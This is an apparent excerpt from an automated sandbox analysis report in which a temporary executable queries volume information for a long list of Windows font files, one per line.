Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
